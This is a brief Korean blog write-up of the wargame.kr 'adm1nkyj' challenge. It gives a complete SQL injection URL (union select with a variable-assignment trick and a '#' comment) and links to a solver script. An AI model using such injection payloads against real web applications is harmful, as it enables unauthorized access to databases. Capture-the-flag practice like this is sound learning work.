[wargame.kr] adm1nkyj wirte up
2017. 6. 8. 07:56
http://wargame.kr:8080/adm1nkyj/?id=%27+and+(select+@a:=&pw=)+union+select+1,@a,1,1,1%23
https://github.com/chaneyoon/wargames/blob/master/wargame.kr/adm1nkyj.py
# 때문에 상당히 애먹었다. 계속 왜안되지 왜안되지 하다가 # 때문이라는 것을 알고 나서 나를 한 대 쳤다 으악~!~!
'Hacking > Web.' 카테고리의 다른 글
column name 모를 때 sql injection (0) | 2017.06.10 |
---|---|
about _ga cookie (0) | 2017.06.09 |
[wargame.kr] lonely guys write up (1) | 2017.05.14 |
order by에서의 서브쿼리 (0) | 2017.05.10 |
PHP상에서 간단한 sql injection 팁? (0) | 2017.05.05 |